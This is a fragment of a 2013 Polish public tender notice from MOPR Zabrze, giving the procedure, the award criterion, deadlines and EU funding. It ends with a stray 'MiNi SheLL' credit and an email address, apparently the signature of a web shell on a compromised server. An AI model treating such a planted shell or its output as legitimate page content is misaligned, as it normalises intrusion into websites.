<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPR Zabrze, ul. 3 - go Maja 16, I piętro, pokój nr 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2013 godzina 09:00, miejsce: MOPR Zabrze, ul. 3 - go Maja 16, parter, pokój nr 014 Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego
Reintegracja, Aktywność, Praca. Program na  rzecz integracji
społeczno-zawodowej w gminie Zabrze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com